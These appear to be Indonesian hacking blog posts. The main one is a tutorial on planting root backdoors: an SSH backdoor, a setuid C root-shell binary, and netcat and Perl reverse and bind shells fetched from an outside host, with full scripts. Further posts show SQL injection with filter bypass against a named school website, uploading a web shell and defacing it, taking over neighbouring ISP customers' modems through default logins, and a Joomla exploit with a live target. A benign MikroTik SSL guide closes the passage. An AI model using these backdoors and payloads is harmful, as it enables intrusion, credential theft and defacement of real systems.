A Little Piece of n00b

Backdooring on Root

banyak yang tanya, giman sih backdooring root itu, apa sih backdoor itu,
 bla....bla....blaa...... bahkan ane sendiri sering nanya2 and browsing2
 hehehe maklum masih cupu, setelah ane explore di mbah google ternyata 
banyak yang menjelaskan opo to kui backdoor ? ok langsung deh, malah 
curhat jadinya, 
<blockquote class="tr_bq">
<div class="body" dir="ltr">
<code>sumber : 
ExploreCrew, SecurityFokus, Hackown,inject0r,ech0, & google 
Terimakasih sebanyak2nya</code></div>
</blockquote>
Root Backdooring ? opo to iki ? 
Root :user yang berhak atas system secara penuh (dewa dalam system) 
Back : belakang (dah pada tau ya hehehe) 
Door : Pintu (apalagi ini :( mesti wes ngerti kabeh) 
 
kesimpulannya Root backdooring adalah : mencari pintu masuk ke target 
mealui jalan belakang sebagai user yang mempunyai akses penuh terhadap 
system 
 
ada bebrapa cara bahkan mungkin banyak cara untuk melakukan backdooring, cuman ane ga tau semua heheheh kan ane masih cupu, 
 
1. SSHDoor 
 
download sshDoor ke target (asumsi di target kita udah ada shell), cari 
di mbah google mesti nemu banyak, download dengan perintah 
<blockquote class="tr_bq">
 <code>wget, curl, wp-download atau terserah pake cara apa yang penting sshDoor da di target</code></blockquote>
Extract sshdoor.tzg , Masuk ke Dir sshdoor, et permission semua File, nstall sshdoor 
<blockquote class="tr_bq">
<div class="body" dir="ltr">
<code>tar -zxvf sshdoor.tgz 
chmod 777 * -R 
./install [password_kita] [port_kompi_kita]</code></div>
</blockquote>
kalo dah selesai install, qt cek bind ke port yg telah di install ssh door 
telnet ke target dari kompi kita 
<blockquote class="tr_bq">
<code>telnet 000.000.000 1111 << IP dan port target</code></blockquote>
kalo ada pesan connected artinya dah sukses, tinggal kita connect pake 
ssh dengan user dan port yang udah kita tentukna pada saat nginstal 
sshDoor tadi 
 
2. RSH 
 :( opo maneh iki xixixiix 
ane juga ga tau, dah nyari tapi lom ketemu heheheheh, pokoknya intinya 
kalo kita dah dapet akses root di target tapi ga bisa ngapa2in Asumsinya
 kita akan melakukan koneksi ke target dengan user lain namun dengan 
akses setara root di port standar SSH target. 
 
sama kek yang pertama kita download dulu script RSHnya kalo ga ya buat new file pake shell kita trus paste script ini 
<blockquote class="tr_bq">
<code>#include  
#include  
#include  
int main() 
{ 
    system("echo  "); 
    system("echo -==[ Root Shell Backdoor ]==-\r\n"); 
    system("echo -==[ Explore Crew UnderGround ]==-\r\n"); 
    system("echo -==[ www.ExploreCrew.Org ]==-\r\n"); 
    system("echo  "); 
    system("echo Starting Interactive Shell...\r\n"); 
    system("echo Session Started. Enjoy the hack !!"); 
    system("echo  "); 
    setuid(0); 
    setgid(0); 
    setgroups(0,0); 
    system("su"); 
    system("exit"); 
    return 0; 
}</code></blockquote>
ubah nama file jadi rsh.c, compail, set permision, ubah passwd user 
mysql , rubah alamat shell user mysql ke /bin/bash , Pindahkan File main
 ke direktory /bin,  
<blockquote class="tr_bq">
<code>mv rsh rsh.c 
gcc -o main rsh.c 
chmod gu+s main 
chmod o+x main 
passwd mysql 
chsh -s /bin/bash mysql 
mv main /bin/</code></blockquote>
oke setelah itu coba login via putty untukkonek ke port ssh standard 
target.. login dengan user mysql, pass sesuai yg dirubah tadi.. 
 
Connect Back Shell 
 
Connect Back Shell atau lebih akrab disebut Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita 
 
Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena 
gak punya akses, denied akses, sekurity dari firewall, atau karena 
komputer sasaran tertutup oleh proxy server (komputer sasaran berada di 
dalam network yang tertutup oleh proxy). Bila ada proxy di depan 
komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa 
melakukan remote konek ke sasaran karena tertutup komputern proxy. 
 
Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena 
port yg kita tuju tidak terbuka di firewall. Firewall menolak semua 
koneksi/request ke port yang tidak dibuka di firewall tersebut. 
Paket-paket berisi request yang di kirim oleh attacker tidak bisa 
melewati dinding firewall karena memang jalur tidak terbuka, sehingga 
request koneksi tidak pernah sampai di komputer sasaran. 
<blockquote class="tr_bq">
<code>D:\HACK>nc -vv 192.168.10.10 1968 
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA 
[192.168.10.10] 1968 (?): connection refused 
sent 0, rcvd 0: NOTSOCK</code></blockquote>
Kasus lain, adalah bila komputer sasaran berada di dalam internal 
network, yang mana network tersebut tertutup oleh proxy server. Dalam 
hal ini, proxy server bertindak sebagai gateway network yang ada di 
dalamnya. 
 
Ketika attacker berhasil binding port di komputer sasaran yang ada di 
dalam proxy, attacker tetap tidak bisa melakukan remote connection 
karena port tidak terbuka di komputer proxy. Proxy mengatur lalu lintas 
data dari port-port yang di seting di proxy untuk di teruskan ke ip dan 
port yang ada di internal network nya. Ketika attacker binding port di 
komputer yang di dalam proxy, di proxy tidak pernah di set port yg 
mengarahkan service ke komputer sasaran melalui port yang di bind. 
Sehinga proxy akan menolak koneksi ke port yang di minta attacker, 
karena proxy memang tidak pernah mengenali service pada port yg di minta
 attacker. 
 
Percobaan koneksi yang akan kita terima adalah seperti berikut : 
<blockquote class="tr_bq">
<code>D:\HACK>nc -vv 192.168.10.10 1968 
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA 
[192.168.10.10] 1968 (?): connection refused 
sent 0, rcvd 0: NOTSOCK</code></blockquote>
Bagaimana kita mendapatkan koneksi ke komputer sasaran sementara di 
depan komputer sasaran ada bodyguard yang selalu memukul dan 
meluluh-lantak-kan setiap koneksi yang di minta dari luar yang tidak di 
kenal? Inilah dia. BackConnect. 
 
Seperti yang saya katakan. Backconnect adalah membalikkan koneksi dari 
komputer sasaran ke komputer attacker yang telah listening pada port 
tertentu, dengan membawa/meluncurkan aplikasi tertentu, dalam hal ini 
(hacking) yang akan kita luncurkan (diluncurkan dari sasaran) adalah 
/bin/bash. 
 
Sehingga ketika komputer sasaran melakukan koneksi ke komputer attacker,
 komputer attacker akan menerima koneksi, dan akan membuka dan 
mengaktifkan aplikasi yang di luncurkan oleh komputer sasaran, dalam hal
 ini adalah /bin/bash. Dengan demikian, attacker mendapatkan akses 
interaktif /bin/bash dari komputer sasaran. It is interactive console. 
 
BackConnect dengan NetCat 
 
Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip 
public, atau ip yang terkoneksi langsung ke internet tanpa penghalang 
proxy.Cara melakukan backconnect sangat mudah, semudah bindshell. Yang 
perlu kita lakukan pertama kali adalah set mode listening di komputer 
kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan 
menerima aplikasi yang diluncurkan oleh kompi sasaran. 
 
[root@localhost][/root] nc -vlp 6888 
listening on [any] 6888 ... 
 
Sip. Kompi kita udah listening. Berikutnya kita koneksikan komputer 
sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti 
biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke 
kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke 
/tmp.  
<blockquote class="tr_bq">
<code>Command untuk backconnect adalah: nc –vv [ip attacker] [port] –e [launch aplication]</code></blockquote>
<blockquote class="tr_bq">
<code>cd /tmp 
wget http://hacking.tool/nc 
chmod 777 nc 
./nc –vv 192.168.10.20 6888 –e /bin/bash</code> </blockquote>
 
Setelah menjalankan command tersebut di komputer sasaran, sekarang 
lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari 
komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh 
komputer sasaran ke komputer kita. 
<blockquote class="tr_bq">
<code>[root@localhost][/root] nc -vlp 6888 
listening on [any] 6888 ... 
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886 
id 
uid=48(nobody) gid=48(nobody) groups=48(nobody) 
uname –a  
Linux  astra.2014.ws  2.6.18-164.el5  #1  SMP  Thu  Sep  3  03:28:30  EDT  2009 
x86_64 x86 _64 x86_64 GNU/Linux</code></blockquote>
Nah, kan. Kita mendapatkan interaktif console melalui teknik 
backconnect. Selanjutnya, ya terserah kita mau apa. Obok-obok sampe puas
 pastinya. 
 
Kalau komputer sasaran adalah windows? Sama aja bos. Hanya aplikasi yang diluncurkan adalah cmd.exe 
<blockquote class="tr_bq">
<code>c –vv 192.168.10.20 6788 –e cmd.exe</code></blockquote>
Kemudian kita lihat di komputer kita yang tadi sudah kita set listening. 
<blockquote class="tr_bq">
<code>[root@localhost][/root] nc -vlp 6788 
listening on [any] 6788 ... 
192.168.10.10: inverse host lookup failed: Unknown host 
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 59681 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 
 
C:\Windows>  <<< dapat!!! Kita telah mendapatkan cmd.exe di komp sasaran 
C:\Windows>ipconfig   <<< tes lihat ip 
ipconfig 
 
Windows IP Configuration 
PPP adapter: 
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.10.10 
        Subnet Mask . . . . . . . . . . . : 255.255.255.255 
        Default Gateway . . . . . . . . . : 192.168.10.100 
 
D:\Windows></code></blockquote>
udah dpt console interaktif. Selanjutnya tinggal command-command sesuka kita. 
 
BackConnect.pl (Backconnect dengan aplikasi perl) 
 
fungsinya, jelas untuk melakukan backconnect dengan aplikasi perl. 
Karena ditulis dengan perl, maka aplikasi ini membutuhkan perl juga di 
komputer sasaran. Bagaimana ngecek nya kalau user kita bisa jalankan 
perl? Seperti yang dulu, tetep perl –v. Gak perlu panjang lebar, 
langsung in action. 
Set mode listening di komputer kita. 
<blockquote class="tr_bq">
<code>nc –vlp 9999</code></blockquote>
Kemudian, kita download backconnect.txt yang sudah kita upload ke 
hosting kita ke komputer sasaran, di direktory yang writeable tentunya. 
Seperti biasa pula, langsung menuju /tmp. 
 
Cara pakai backconnectnya: perl backconnect.txt [ip] [port] 
<blockquote class="tr_bq">
<code>cd /tmp 
wget http://hacking.tool/backconnect.txt 
perl backconnect.txt 192.168.10.20 9999 &</code></blockquote>
Setelah menjalankan command ini di komputer korban, kembali ke komputer 
kita. Dan lihat,kita dapat console sang korban. 
<blockquote class="tr_bq">
<code>[root@localhost][/root] nc -vlp 9999 
listening on [any] 9999 ... 
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 44808 
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 
x86_64 x86_64 x86_64 GNU/Linux 
uid=48(nobody) gid=48(nobody) groups=48(nobody) 
pwd 
/tmp 
whoami 
apache</code></blockquote>
ini script backconnect perlnya 
<blockquote class="tr_bq">
<div class="body" dir="ltr">
<code>#!/usr/bin/perl 
use Socket; 
$cmd= "lynx"; 
$system= 'echo "`uname -a`";echo "`id`";/bin/sh'; 
$0=$cmd; 
$target=$ARGV[0]; 
$port=$ARGV[1]; 
$iaddr=inet_aton($target) || die("Error: $!\n"); 
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); 
$proto=getprotobyname('tcp'); 
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); 
connect(SOCKET, $paddr) || die("Error: $!\n"); 
open(STDIN, ">&SOCKET"); 
open(STDOUT, ">&SOCKET"); 
open(STDERR, ">&SOCKET"); 
system($system); 
close(STDIN); 
close(STDOUT); 
close(STDERR);</code></div>
</blockquote>
Bind Shell 
 
Bindshell adalah membuka port (binding) pada komputer korban dengan 
mengikutkan service/aplikasi yang akan melayani koneksi yang di terima 
dari port yg di buka. Umumnya aplikasi yang di pakai adalah /bin/bash. 
Sehingga ketika terjadi koneksi ke port yg di buka, maka komputer korban
 akan menjalankan aplikasi /bin/bash dan meluncurkannya kepada attacker.
 Disebut bindshell karena bind di lakukan dengan memberikan service 
shell (/bin/bash). Dengan demikian, attacker yg melakukan koneksi ke 
port yg di bind tersebut, akan mendapatkan /bin/bash dari komputer 
korban. It is a interactive console. 
 
Banyak metode untuk melakukan bindshell. Berikut beberapa contoh teknik 
melakukan bindshell dengan menggunakan netcat dan aplikasi perl. 
 
Bindshell dengan NetCat 
 
Kita implementasikan komputer korban memiliki ip address 192.168.10.10 
Sedangkan komputer kita, memiliki ip address 192.168.10.20 Banyak yang 
bertanya, bagaimana menjalankan command tersebut di komputer sasaran? 
Banyak cara, yang jelas kita harus mendapatkan akses ke komputer korban 
atau bisa menjalankan command ke komputer korban, misalnya kita punya 
webshell di komputer korban, atau ninja bayaran kita sudah siap sedia di
 komputer korban untuk menjalankan perintah kita. Intinya kita harus 
bisa mengirimkan perintah ke komputer korban, baik melalui rfi, 
webshell, lfi, rce, dll. 
 
Langsung kita bind komputer sasaran kita. Pastinya file netcat (nc) 
harus ada di komputer yang akan kita bind. Jadi kita harus download dulu
 file nc ke komputer sasaran. Banyak command untuk download. Salah 
satunya adalah wget. 
 
Masuk ke direktory yang writeable. Gak perlu lama-lama. Langsung masuk /tmp. Direktory ini udah tentu writeable. 
<blockquote class="tr_bq">
<code>cd /tmp 
Dowload netcat 
wget http://haking.tool/nc 
Set permission executable pada nc 
chmod 777 nc 
Bindshell 
./nc –v –l –p 4444 –e /bin/bash &</code></blockquote>
Sampai disini, kita telah melakukan bind ke port 4444 dengan srvice 
aplikasi /bin/bash. Tanda “&” di belakang command akan membuat bind 
dijalankan secara background (daemon process). 
 
Cara termudah untuk ngecek apakah bindport berhasil, lakukan telnet ke 
host sasaran pada port yg kita bind tadi. Bila anda mendapati pesan 
“connected” or blank, menunjukkan anda sudah konek ke port yg kita bind.
 Dengan demikian, bind port yg kita lakukan berhasil. 
 
Perlu di ingat, bahwa netcat adalah sekali konek. Ketika ada koneksi, 
setelah itu port tidak lagi terbuka, termasuk ketika ngecek dengen 
telnet. Untuk itu, lakukan sekali lagi kalau mau konek ke console. 
 
Trus gimana cara melakukan remote conection pada komputer yg telah di 
bind? Pakai netcat. Tentunya harus punya netcat di komputer kita. 
Command untuk remote connect dengan netcat sangat simple. 
<blockquote class="tr_bq">
<code>nc –vv [ip host sasaran] [port]</code></blockquote>
<blockquote class="tr_bq">
<code>D:\HACK>nc -vv 192.168.10.10 4444 
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA 
[192.168.10.10] 4444 (?) open</code></blockquote>
Perhtikan pesan “open” pada port. Itu menunjukkan kalau port terbuk. 
Cursor yang berpindah ke bawah (seperti blank tidak ada apa apa), itu 
bukan blank, tapi itu adalah console yang kamu dapatkan melalu bind port
 dengan netcat. Kita bisa langsung jalankan command-command disini. 
<blockquote class="tr_bq">
<code>D:\HACK>nc -vv 192.168.10.10 4444 
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA 
[192.168.10.10] 4444 (?) open 
id   <<< command 
uid=100(nobody) gid=101(nobody) groups=101(nobody) context=user_u: 
pwd  <<< command 
/tmp 
uname -a 
Linux bajaj.mempreng.com 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 
2007 i686 i686 i386 GNU/Linux</code></blockquote>
Namun, bila beruntung kita akan mendapatkan tmpilan console dengan prompt console dari linux. 
<blockquote class="tr_bq">
<code>D:\HACK>nc -vv 192.168.10.10 4444 
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA 
[192.168.10.10] 4444 (?) open</code></blockquote>
<blockquote class="tr_bq">
<code>ash-3.2$ id 
uid=100(nobody) gid=101(nobody) groups=101(nobody) context=user_u: 
bash-3.2$ pwd 
/var/lib/mysql 
bash-3.2$ uname -a 
Linux bajaj.mempreng.com 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 
2007 i686 i686 i386 GNU/Linux</code></blockquote>
Kalau komputer sasaran os nya adalah windows, kita bisa menambahkan 
option –d ketika ngebind. Option ini bisa mengirimkan aplikasi cmd.exe 
melalui telnet. Sehingga kita bisa menggunakan telnet untuk remote 
connection. Implementasi ip 192.168.10.30 ber-OS winduz. 
<blockquote class="tr_bq">
<code>nc –vlp 7777 –e cmd.exe –d</code></blockquote>
Now try connect using telnet. 
<blockquote class="tr_bq">
<code>D:\HACK> telnet 192.168.10.30 7777 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 
C:\Documents and Settings\Administrator> << console on remote host 
C:\Documents and Settings\Administrator> ipconfig 
Windows IP Configuration 
Local Network Connection : 
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.10.30 << ip sasaran 
        Subnet Mask . . . . . . . . . . . : 255.255.255.255 
        Default Gateway . . . . . . . . . : 192.168.10.100 
C:\Documents and Settings\Administrator></code></blockquote>
Perhatikan ketika kita jalankan command ipconfig, bukan ip kita yang 
terlihat, tapi ip sasaran. Ini karena kita memang berada di console 
sasaran. Sampai disini, kita sudah dapat console secara interaktif ke 
komputer sasaran kita, dimana kita bisa se-enaknya menjalankan 
command-commnd ke server secara interaktif. Untuk mengakhiri mode 
console, cukup tekan ctrl+c atau exit. 
 
Bindshell.pl (Aplikasi perl khusus bindshell) 
 
Cara lain untuk bindshell adalah menggunakan aplikasi perl. Aplikasi ini
 di tulis khusus untuk melakukan bindshell dengan menjalankan service 
/bin/bash. Kita tidak perlu lagi men-setting aplikasi apa yang akan di 
jalankan. Bindshell.pl cukup baik dan mudah, namun juga perlu aplikasi 
perl untuk menjalankanya. Jika user yang kita pakai tidak punya akses ke
 perl, bindshell.pl tidak bisa digunakan. Bagaimana mengecek apakah kita
 bisa jalankan perl? Cukup ketik perl –v. Langsung in action. 
 
Seperti biasa, masuk direktory yg writeable atau langsung /tmp. Download
 bindshell.txt dari host kamu. Kok bindshell.txt, bukan bindshell.pl? 
iya, Cuma extensi. Hal ini menghindari error ketika mendownload. Jadi 
upload bindshell.pl dengan extensi .txt. terakhir, langsung bind gak 
pake lama. 
 
Command bindshell nya: perl bindshell.txt [port] 
<blockquote class="tr_bq">
<code>cd /tmp 
lwp-download http://hacking.tool/bindshell.txt 
perl bindshell.txt 9898 &</code></blockquote>
Sip. Dari sini, kita udah bisa ngecek pakek telnet apakah konek or 
kagak. Bindshell.pl bersifat continue, jadi kita bisa berkali-kali konek
 dengan sekali ngebind, asalkan proses tidak di kill oleh admin. 
 
Apa berikutnya? Jelas, remote connection to get remote interactive console. Tetep pake netcat. 
<blockquote class="tr_bq">
<code>D:\HACK>nc -vv 192.168.10.10 9898 
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA 
[192.168.10.10] 9898 (?) open 
bash: no job control in this shell 
bash-3.2$ id 
uid=100(mysql) gid=101(mysql) groups=101(mysql) context=user_u: 
bash-3.2$ pwd 
/tmp 
bash-3.2$ uname -a 
Linux bajaj.mempreng.com 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 
2007 i686 i686 i386 GNU/Linux</code></blockquote>
Berikut adalah code untuk bindshell (perl). 
<blockquote class="tr_bq">
<code>#!/usr/bin/perl 
$SHELL="/bin/bash -i"; 
if (@ARGV < 1) { exit(1); } 
$LISTEN_PORT=$ARGV[0]; 
use Socket; 
$protocol=getprotobyname('tcp'); 
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n"; 
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); 
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n"; 
listen(S,3) || die "Cant listen port\n"; 
while(1) 
{ 
    accept(CONN,S); 
    if(!($pid=fork)) 
    { 
        die "Cannot fork" if (!defined $pid); 
        open STDIN,"<&CONN"; 
        open STDOUT,">&CONN"; 
        open STDERR,">&CONN"; 
        exec $SHELL || die print CONN "Cant execute $SHELL\n"; 
        close CONN; 
        exit 0; 
    } 
}</code></blockquote>
 
Credit: 
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="post_avatar" width="1">
 
 </td>
 <td class="post_author">
 wenkhairu</td></tr>
</tbody></table>

Backdooring on Root

15 Feb 2012

Tutor SQLI Bypass Forbidden+Uploading shell+Hidden_Deface

Bumbu: 
 
- Exploit web apps (Exploit CMS Endonesia) 
link exploit 
<a href="http://www.exploit-db.com/exploits/15006/" target="_blank">http://www.exploit-db.com/exploits/15006/</a> 
 
- web Shell+tamper data

- Cheat MySQL 
 
 
ane kutip dikit exploit nya 
<blockquote class="tr_bq">
<div class="codeblock">

<div class="title">
Code: 
</div>
<div class="body" dir="ltr">
<code>============================================================================================ 
[Vulnerability File] 
http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i] 
[ DEMO ] 
http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors-- 
============================================================================================</code></div>
</div>
</blockquote>
dari keterangan di atas, kita dapat info kalo cms ini default table_user
 nya bernama "authors". di dalam tabel authors terdapat 3 kolom yaitu 
"aid,name,pwd". jadi ketika kita nginject target, tinggal masukin aja 
nama-nama kolom tersebut pada angka kolom yang vulner, tanpa mengextract
 database information_schema dari mysql nya. <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
biar lebih efektif dan hemat waktu 
<blockquote class="tr_bq">
<code>http://smp24-padang.sch.id/mod.php?mod=diskusi&op=viewcat&cid=-2+union+all+select+1,2,3--</code></blockquote>
yang ditampilkan malah  
<div class="separator" style="clear: both; text-align: center;">
<a href="http://sdp-padang.sch.id/mod/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://sdp-padang.sch.id/mod/1.JPG" width="320" /></a></div>
cheat sql buat ngakalin nya, union+all+select di ubah bentuk nya ke /*union*/+all+/*select*/ 
<blockquote class="tr_bq">
<code>http://sdp-padang.sch.id/mod.php?mod=diskusi&op=viewcat&cid=-2+/*!union*/+all+/*!select*/+1,2,3--</code></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://sdp-padang.sch.id/admin/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="http://sdp-padang.sch.id/admin/2.JPG" width="320" /></a></div>
 
maka di tampilkan angka kolom yang vulner yaitu angka 2. gak usah 
extract information_Schema langsung masukin nama kolom dari keterang 
exploit nya di atas. 
<blockquote class="tr_bq">
<div class="body" dir="ltr">
<code>http://sdp-padang.sch.id/mod.php?mod=diskusi&op=viewcat&cid=-2+/*!union*/+all+/*!select*/+1,pwd,3+from+authors--</code></div>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://sdp-padang.sch.id/admin/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://sdp-padang.sch.id/admin/3.JPG" width="320" /></a></div>
masuk ke halaman admin nya dan mari upload shell ente.<img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" />  
<a href="http://sdp-padang.sch.id/admin.php" target="_blank">http://sdp-padang.sch.id/admin.php</a> 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://sdp-padang.sch.id/admin/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://sdp-padang.sch.id/admin/4.JPG" width="320" /></a></div>
untuk cms ini uploader nya ada di mod_informasi 
jadi ente upload make tamper data dah banyak thread nya di sini, terus path shell nya 
 
site/mod/informasi/foto/nama_shell ente.php 
<a href="http://sdp-padang.sch.id/mod/informasi/foto/42.php" target="_blank">http://sdp-padang.sch.id/mod/informasi/foto/42.php</a> 
<a href="http://sdp-padang.sch.id/admin/warning.txt" target="_blank">http://sdp-padang.sch.id/admin/warning.txt</a> 
 
"Apache 
Linux us3.clientdomainmanager.org 2.6.18-028stab070.14 #1 SMP Thu Nov 18 16:04:02 MSK 2010 x86_64 " 
 
bagi yang pengen deface ya silahkan di deface hidden deface, kalo full index kasihan juga web sekolahan. <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
 
 
note: 
- ane mepes target ini tujuan nya hanya untuk pembelajaran. 
- nyari domain luar gak ada soalnya ni cms dari indo <img alt="ngakak" border="0" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" style="vertical-align: middle;" title="ngakak" /> 
- dah reporting bug tapi gak di gubrish 
- kalo gak berkenan silahkan di closed atau hapus ajah <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" />  
 
Credit: "ohara" <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
<div class="separator" style="clear: both; text-align: center;">
</div>

Tutor SQLI Bypass Forbidden+Uploading shell+Hidden_Deface

Bumbu: - Exploit web apps (Exploit CMS Endonesia) link exploit http://www.exploit-db.com/exploits/15006/ - web Shell+tamper data - Cheat MySQL ane kutip dikit exploit nya Code: ======================…

14 Feb 2012

Tutorial Hacking Speedy Account

Langsung sja.<img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
 
1. Go To <a href="http://speedtest.net/" target="_blank">http://speedtest.net</a> , Copy IP Lo yang disana , misalnya dapet 125.6.23.111 
 2. paste IP Lo di Web Browser , di wajibkan pake Mozilla Firefox 
 3. ganti angka belakang di IP Lo , misalnya IP Lo 125.6.23.111 , ganti jadi 125.6.23.112 
 4.nanti muncul auth masukin Username / password , biasa nya password default modem tuh username : admin , password : admin, 
 5. kalo password salah , ubah lagi angka belakang nya seterah , inget hanya 3 angka dibelakang 
 6. kalo udah masuk , misalnya modem TP - LINK , 
 - Klik Quickstart , 
 - muncul Pop Out , next > setting waktu = next > nah , nanti 
muncul username / password [password nya masih berbentuk *****] 
7. copy addres POP Out tadi ke TAB Baru di browser , tunggu sampe reload selesai 
8. kalo udah masukin Java script : 
<blockquote class="tr_bq">
<div class="codeblock">

<div class="title">
Code: 
</div>
<div class="body" dir="ltr">
<code>javascript: (/*hoamzzz*/ 
function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; 
j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if 
(f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if 
(s) alert("Passwordnya adalah:\n\n" + s); else alert("Tidak ada password
 bintang disini.");})();</code></div>
</div>
</blockquote>
9. nanti muncul Password nya , :brucelee::brucelee: 
10. kalo udah seterah lu mau di apa apain <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
 
 
NB : Gw gak bertanggung jawab apa yang terjadi 
 - dan ini cuma buat yang pake internet pribadi <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
 
 
 
 
<a href="http://aldyjrz.blogspot.com/" target="_blank">Sumber</a>

Tutorial Hacking Speedy Account

Langsung sja. 1. Go To http://speedtest.net , Copy IP Lo yang disana , misalnya dapet 125.6.23.111 2. paste IP Lo di Web Browser , di wajibkan pake Mozilla Firefox 3. ganti angka belakang di IP Lo ,…

11 Feb 2012

Joomla Advanced Search SQL Injection POST methode (com_cb_search)

<div class="title">
Code: 
</div>
<div class="body" dir="ltr">
<code>=================================================================================================== 
###= Exploit title    : Joomla COmponent Advanced Search SQL Injection POST Methode (com_cb_search) 
=================================================================================================== 
###= Author                 : ~devilzc0der 
###= Home                   : http://www.devilzc0de.org/forum 
###= Email                  : vanazy66[at]live[titik].com 
###= Script download        : http://d_rev7x.byethost11.com/cb_search_2.0.4_mod.zip 
###= Google Dork            : inurl:"com_cb_search" 
###= Exploit                : Input character SQL Injection methode as :
 quotes (2'),that character same as (2%27) into table Advanced Search 
###= Demo                   : http://humas.ui.ac.id/index.php?option=com_cb_search&Itemid=34 
###= Special thanks to      : Wenkhairu (makasih om penjelasannya),Mbak Nofia Fitri,and all of devilzc0der in the world.</code></div>
</div>
</blockquote>
./tian hv

Joomla Advanced Search SQL Injection POST methode (com_cb_search)

Code: =================================================================================================== ###= Exploit title : Joomla COmponent Advanced Search SQL Injection POST Methode (com_cb_s…

10 Feb 2012

Membuat login hotspot mikrotik dengan SSL agar lebih aman

Sabagai salah satu tahapan finishing setup mikrotik, maka diperlukan koneksi tersandi ke hotspot mikrotik. 
 
Ini sangat penting karena dengan integrasi otentifikasi mikrotik dengan radius dan LDAP yang hanya bisa PAP (tidak bisa CHAP). 
 
Tahapan yang dilakukan yaitu : 
 
A. Membuat sertifikat SSL di OS Linux 
 
Untuk dapat membuat sertifikat diperlukan aplikasi openSSL, maka apabila di OS Linux belum ada diperlukan instalasi openSSL. 
 
1. membuat key 
<blockquote class="tr_bq">
<code># openssl genrsa -des3 -out hotspot.key 1024 
 
Generating RSA private key, 1024 bit long modulus 
……………….++++++ 
……++++++ 
e is 65537 (0×10001) 
Enter pass phrase for hotspot.key: <password> 
Verifying - Enter pass phrase for hotspot.key: <ulangi password></code></blockquote>
–> akan dibuat file hotspot.key 
 
2. Membuat request key 
# openssl req -new -key hotspot.key -out hotspot.csr 
<blockquote class="tr_bq">
<code>Enter pass phrase for hotspot.key: 
    You are about to be asked to enter information that will be incorporated 
    into your certificate request. 
    What you are about to enter is what is called a Distinguished Name or a DN. 
    There are quite a few fields but you can leave some blank 
    For some fields there will be a default value, 
    If you enter ‘.’, the field will be left blank. 
    —– 
    Country Name (2 letter code) [GB]:ID 
    State or Province Name (full name) [Berkshire]:DIY 
    Locality Name (eg, city) [Newbury]:Yogyakarta 
    Organization Name (eg, company) [My Company Ltd]:UII 
    Organizational Unit Name (eg, section) []:. 
